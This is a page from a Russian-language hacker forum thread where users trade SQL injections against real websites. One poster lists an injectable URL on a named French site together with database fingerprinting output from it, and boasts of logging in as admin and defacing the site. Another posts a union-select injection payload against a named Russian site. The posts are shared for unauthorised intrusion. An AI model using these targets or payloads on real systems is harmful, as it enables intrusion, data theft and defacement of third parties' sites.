Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666

sepo.
1.Ты сильно умничаешь.
2.От тебя постоянно древние сайты уезвимости с 2000 годов и сайты такие с 2000 - 2003 заброшеные , неразу свежего сайта за 2010 год небыло.

Post #: 114

RE: Ваши Sql-инъекции - 2010-05-15 14:10:04.380000

sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

Взял с античата и довёл до логического конца…
http://www.mfrchallans.fr Host IP: 88.191.253.157
Web Server: Apache/1.3.34 (Ubuntu) mod_vhost_online/1.2 mod_fastcgi/2.4.2 mod_log_online/0.1
Powered-by: PHP/4.4.9-1.standard
DB Server: MySQL
Current User: mfrchallansfr@88.191.253.149
Sql Version: 5.0.51a-3ubuntu5.4-log
Current DB: mfrchallansfr
System User: mfrchallansfr@88.191.253.152
Host Name: pf2-mysql
Installation dir: /usr/
DB User: 'mfrchallansfr'@'%'
Data Bases: information_schema
mfrchallansfr
Data Bases: information_schema

http://www.mfrchallans.fr/actualite.php?idactu=78

Post #: 115

RE: Ваши Sql-инъекции - 2010-05-15 14:22:49.110000

reigan

Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666

Да ладно ты на фотошопе всё зделал)))))))))))))))))):D

Post #: 116

RE: Ваши Sql-инъекции - 2010-05-15 14:35:55.240000

reigan

Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666

http://www.mfrchallans.fr тут доступа на запись и чтение нету, что exploit под linux использовал ?

Post #: 117

RE: Ваши Sql-инъекции - 2010-05-15 15:28:00.180000

sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

quote:

ORIGINAL: reigan

http://www.mfrchallans.fr тут доступа на запись и чтение нету, что exploit под linux использовал ?

sql-injection+admin login:pawd=hacked by SEPO

Post #: 118

RE: Ваши Sql-инъекции - 2010-05-15 17:43:08.060000

reigan

Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666

sepo есть предложение о сотруднечестве какойлибо форме, если интерестно напиши номер аськи в личное.

Post #: 119

RE: Ваши Sql-инъекции - 2010-05-15 17:58:02.406666

S00pY

Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666

Какой-то хостинг :(
dxnet.ru/news/-40'+union+select+1,2,3–+

Post #: 120

Страниц: 1 2 [3] 4 5 6 7 8 9 10 11 12 13 14 15 16 17

Все форумы >> [Уязвимости] >> RE: Ваши Sql-инъекции

Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.